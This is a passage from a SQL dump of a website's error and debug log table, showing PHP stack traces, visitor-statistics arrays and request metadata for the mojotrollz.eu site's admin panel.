page_mojotrollz::action_user_bank()\n#4 /home/web/webdir/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/index.php(12): SYSTEM\\API\\api::run(\'\\SYSTEM\\API\\ver...\', \'page_mojotrollz\', Array, 1, false, true)\n#6 {main}\n [7] => 84.167.4.98\n [ip] => 84.167.4.98\n [8] => 0.004\n [querytime] => 0.004\n [9] => 2013-12-26 19:28:46\n [time] => 2013-12-26 19:28:46\n [10] => mojotrollz.eu\n [server_name] => mojotrollz.eu\n [11] => 80\n [server_port] => 80\n [12] => /web/mojotrollz/?action=user_bank\n [request_uri] => /web/mojotrollz/?action=user_bank\n [13] => a:0:{}\n [post] => a:0:{}\n [14] => http://mojotrollz.eu/web/mojotrollz/?\n [http_referer] => http://mojotrollz.eu/web/mojotrollz/?\n [15] => Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\n [http_user_agent] => Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\n [16] => 11\n [user] => 11\n [17] => 1\n [thrown] => 1\n )\n\n [10] => Array\n (\n [0] => 11\n [ID] => 11\n [1] => SYSTEM\\LOG\\ERROR\n [class] => SYSTEM\\LOG\\ERROR\n [2] => Class not found: user_logout\n [message] => Class not found: user_logout\n [3] => 1\n [code] => 1\n [4] => /home/web/webdir/system/system/autoload.php\n [file] => /home/web/webdir/system/system/autoload.php\n [5] => 66\n [line] => 66\n [6] => #0 /home/web/webdir/system/autoload.inc.php(8): SYSTEM\\autoload::autoload(\'user_logout\')\n#1 [internal function]: __autoload_system(\'user_logout\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/page/page_mojotrollz.php(36): spl_autoload_call(\'user_logout\')\n#3 [internal function]: page_mojotrollz::action_user_logout()\n#4 /home/web/webdir/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/index.php(12): SYSTEM\\API\\api::run(\'\\SYSTEM\\API\\ver...\', \'page_mojotrollz\', Array, 1, false, true)\n#6 {main}\n [trace] => #0 /home/web/webdir/system/autoload.inc.php(8): SYSTEM\\autoload::autoload(\'user_logout\')\n#1 [internal function]: __autoload_system(\'user_logout\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/page/page_mojotrollz.php(36): spl_autoload_call(\'user_logout\')\n#3 [internal function]: page_mojotrollz::action_user_logout()\n#4 /home/web/webdir/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/index.php(12): SYSTEM\\API\\api::run(\'\\SYSTEM\\API\\ver...\', \'page_mojotrollz\', Array, 1, false, true)\n#6 {main}\n [7] => 84.167.4.98\n [ip] => 84.167.4.98\n [8] => 0.008\n [querytime] => 0.008\n [9] => 2013-12-26 19:28:50\n [time] => 2013-12-26 19:28:50\n [10] => mojotrollz.eu\n [server_name] => mojotrollz.eu\n [11] => 80\n [server_port] => 80\n [12] => /web/mojotrollz/?action=user_logout\n [request_uri] => /web/mojotrollz/?action=user_logout\n [13] => a:0:{}\n [post] => a:0:{}\n [14] => http://mojotrollz.eu/web/mojotrollz/?\n [http_referer] => http://mojotrollz.eu/web/mojotrollz/?\n [15] => Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\n [http_user_agent] => Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\n [16] => 11\n [user] => 11\n [17] => 1\n [thrown] => 1\n )\n\n)\n', '9109f4a07412cc64038562672f950a746521b15d', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 66, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'3600\', \'2013.12.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.044, '2014-11-28 15:06:51', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=3600&db=2013.12.db', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (364, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => Array\n (\n [0] => 2013-12-26 19:28:50\n [day] => 2013-12-26 19:28:50\n [1] => 1\n [count] => 1\n [2] => 1\n [user_unique] => 1\n [3] => 1\n [ip_unique] => 1\n )\n\n [1] => Array\n (\n [0] => 2013-12-26 19:28:46\n [day] => 2013-12-26 19:28:46\n [1] => 1\n [count] => 1\n [2] => 1\n [user_unique] => 1\n [3] => 1\n [ip_unique] => 1\n )\n\n [2] => Array\n (\n [0] => 2013-12-26 19:25:58\n [day] => 2013-12-26 19:25:58\n [1] => 1\n [count] => 1\n [2] => 1\n [user_unique] => 1\n [3] => 1\n [ip_unique] => 1\n )\n\n [3] => Array\n (\n [0] => 2013-12-26 19:25:24\n [day] => 2013-12-26 19:25:24\n [1] => 1\n [count] => 1\n [2] => 1\n [user_unique] => 1\n [3] => 1\n [ip_unique] => 1\n )\n\n [4] => Array\n (\n [0] => 2013-12-26 19:24:52\n [day] => 2013-12-26 19:24:52\n [1] => 1\n [count] => 1\n [2] => 1\n [user_unique] => 1\n [3] => 1\n [ip_unique] => 1\n )\n\n [5] => Array\n (\n [0] => 2013-12-26 19:24:47\n [day] => 2013-12-26 19:24:47\n [1] => 1\n [count] => 1\n [2] => 1\n [user_unique] => 1\n [3] => 1\n [ip_unique] => 1\n )\n\n [6] => Array\n (\n [0] => 2013-12-25 21:03:34\n [day] => 2013-12-25 21:03:34\n [1] => 1\n [count] => 1\n [2] => 1\n [user_unique] => 1\n [3] => 1\n [ip_unique] => 1\n )\n\n [7] => Array\n (\n [0] => 2013-12-25 21:01:00\n [day] => 2013-12-25 21:01:00\n [1] => 1\n [count] => 1\n [2] => 1\n [user_unique] => 1\n [3] => 1\n [ip_unique] => 1\n )\n\n [8] => Array\n (\n [0] => 2013-12-25 20:57:08\n [day] => 2013-12-25 20:57:08\n [1] => 1\n [count] => 1\n [2] => 1\n [user_unique] => 1\n [3] => 1\n [ip_unique] => 1\n )\n\n [9] => Array\n (\n [0] => 2013-12-25 20:46:22\n [day] => 2013-12-25 20:46:22\n [1] => 1\n [count] => 1\n [2] => 1\n [user_unique] => 1\n [3] => 1\n [ip_unique] => 1\n )\n\n [10] => Array\n (\n [0] => 2013-12-25 20:45:55\n [day] => 2013-12-25 20:45:55\n [1] => 1\n [count] => 1\n [2] => 1\n [user_unique] => 1\n [3] => 1\n [ip_unique] => 1\n )\n\n)\n', '5669e5e2d4964c185aaa53375099eff6dfb15397', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 65, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'3600\', \'2013.12.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.016, '2014-11-28 15:07:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=3600&db=2013.12.db', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (365, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => Array\n (\n [0] => \n [day] => \n [1] => 11\n [count] => 11\n [2] => 2\n [user_unique] => 2\n [3] => 2\n [ip_unique] => 2\n )\n\n)\n', '7ecedc98384c5dd464c39012a5a42fcefa323a93', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 65, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'3600\', \'2013.12.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.016, '2014-11-28 15:11:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=3600&db=2013.12.db', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 8, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (366, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => Array\n (\n [0] => \n [DATE(time,"unixepoch")] => \n [1] => \n [day] => \n [2] => 11\n [count] => 11\n [3] => 2\n [user_unique] => 2\n [4] => 2\n [ip_unique] => 2\n )\n\n)\n', 'c3e6cf45549fa8428509fb63510a3be76a136e27', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 67, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'3600\', \'2013.12.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.016, '2014-11-28 15:12:45', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=3600&db=2013.12.db', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (367, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => Array\n (\n [0] => \n [day1] => \n [1] => \n [day] => \n [2] => 11\n [count] => 11\n [3] => 2\n [user_unique] => 2\n [4] => 2\n [ip_unique] => 2\n )\n\n)\n', 'f72437b019ca52b72705b7570baa36c34f9785e7', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 67, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'3600\', \'2013.12.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.016, '2014-11-28 15:13:48', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=3600&db=2013.12.db', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 8, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (368, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => Array\n (\n [0] => 1388086130\n [day1] => 1388086130\n [1] => \n [day] => \n [2] => 11\n [count] => 11\n [3] => 2\n [user_unique] => 2\n [4] => 2\n [ip_unique] => 2\n )\n\n)\n', '98d7eada4939bc6b387de5515668bc86875a123c', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 67, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'3600\', \'2013.12.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.016, '2014-11-28 15:16:32', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=3600&db=2013.12.db', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (369, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => Array\n (\n [day1] => 1388086130\n [day] => \n [count] => 11\n [user_unique] => 2\n [ip_unique] => 2\n )\n\n)\n', 'c71265abb04f6291cc618f8453cc23838b541bd7', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 67, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'3600\', \'2013.12.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.016, '2014-11-28 15:16:57', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=3600&db=2013.12.db', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (370, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => Array\n (\n [day] => 1388084400\n [count] => 6\n [user_unique] => 2\n [ip_unique] => 1\n )\n\n [1] => Array\n (\n [day] => 1388005200\n [count] => 2\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n [2] => Array\n (\n [day] => 1388001600\n [count] => 3\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n)\n', '0f73900d5a0f0a7d283e1747755755ff0353dc90', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 66, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'3600\', \'2013.12.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.016, '2014-11-28 15:18:12', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=3600&db=2013.12.db', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (371, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => Array\n (\n [day] => 1386720000\n [count] => 11\n [user_unique] => 2\n [ip_unique] => 2\n )\n\n)\n', '2f04a16b3e8325e2e39c9bcbcc99f14c563f7482', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 66, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'2592000\', \'2013.12.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.016, '2014-11-28 15:18:00', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=2592000&db=2013.12.db', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (372, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => Array\n (\n [day] => \n [count] => 11\n [user_unique] => 2\n [ip_unique] => 2\n )\n\n)\n', 'b54759e5d9ad5b93c0cec37506dac6aa9b937734', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 66, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'2592000\', \'2013.12.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.016, '2014-11-28 15:21:00', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=2592000&db=2013.12.db', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 7, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (373, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => Array\n (\n [day] => 1388084400\n [day2] => \n [count] => 6\n [user_unique] => 2\n [ip_unique] => 1\n )\n\n [1] => Array\n (\n [day] => 1388005200\n [day2] => \n [count] => 2\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n [2] => Array\n (\n [day] => 1388001600\n [day2] => \n [count] => 3\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n)\n', '7509bd314fc0331b0343046acd72a0b4ac69fd60', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 67, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'3600\', \'2013.12.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.02, '2014-11-28 15:22:28', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=3600&db=2013.12.db', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 4, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (374, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => Array\n (\n [day] => 1388016000\n [day2] => \n [count] => 6\n [user_unique] => 2\n [ip_unique] => 1\n )\n\n [1] => Array\n (\n [day] => 1387929600\n [day2] => \n [count] => 5\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n)\n', '47650f349e9a6e5a7c568e6b60ee49c80225cc4e', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 67, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'86400\', \'2013.12.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.016, '2014-11-28 15:24:30', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=86400&db=2013.12.db', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (375, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => Array\n (\n [day] => 1388084400\n [day2] => 2013-12-26 20:00:00\n [count] => 6\n [user_unique] => 2\n [ip_unique] => 1\n )\n\n [1] => Array\n (\n [day] => 1388005200\n [day2] => 2013-12-25 22:00:00\n [count] => 2\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n [2] => Array\n (\n [day] => 1388001600\n [day2] => 2013-12-25 21:00:00\n [count] => 3\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n)\n', '9435970a826af4a578b3b98a6b82ea7c8d35aa8a', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 67, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'3600\', \'2013.12.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.016, '2014-11-28 15:26:12', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=3600&db=2013.12.db', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (376, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => Array\n (\n [day] => 2013-12-26 20:00:00\n [count] => 6\n [user_unique] => 2\n [ip_unique] => 1\n )\n\n [1] => Array\n (\n [day] => 2013-12-25 22:00:00\n [count] => 2\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n [2] => Array\n (\n [day] => 2013-12-25 21:00:00\n [count] => 3\n [user_unique] => 1\n [ip_unique] => 1\n )\n\n)\n', '43a84cd39dbdb081e13cad425df517972b0c40f0', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 66, '#0 [internal function]: 